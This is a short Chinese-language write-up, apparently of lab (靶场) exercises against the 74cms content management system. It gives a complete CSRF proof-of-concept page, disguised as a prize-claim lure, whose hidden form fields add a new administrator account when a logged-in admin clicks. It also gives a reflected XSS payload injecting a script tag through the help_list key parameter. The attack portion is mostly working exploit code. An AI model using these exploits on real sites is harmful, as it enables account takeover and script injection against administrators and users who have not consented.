打开页面
访问构造好的恶意页面:
点击领取后,新管理员被添加。
使用新管理员登陆,可见能够成功登陆:
poc(需手动修改靶场域名):
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>恭喜你中奖啦</title>
</head>
<body>
<center> <img src="http://5b0988e595225.cdn.sohucs.com/images/20181224/19d726af92e848b69690d786a5390f66.jpeg"/></center>
<form action="此处为靶场域名?m=admin&c=admin&a=add" method="POST" id="transfer" name="transfer">
<input type="hidden" name="username" value="test">
<input type="hidden" name="email" value="test@test.com">
<input type="hidden" name="password" value="passwd">
<input type="hidden" name="repassword" value="passwd">
<input type="hidden" name="role_id" value="1">
<input type="hidden" name="submit3" value="添加">
<center><button type="submit" value="Submit">进入领取</button></center>
</form>
</body>
</html>
一个很新的反射型XSS漏洞,来自较新版本的74cms。
打开网址,来到首页。 在url处拼接payload,触发xss:
payload:
http://[此处为靶场网址]/index.php?m=&c=help&a=help_list&key=137244gq1lw%253cscript%253ealert%25281%2529%253c%252fscript%253edutvxlqd4lq&__hash__=d7aa5a382f14d270c3ac4de8392b4e1d_a34adb2b339972672eb447276f69ee88
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.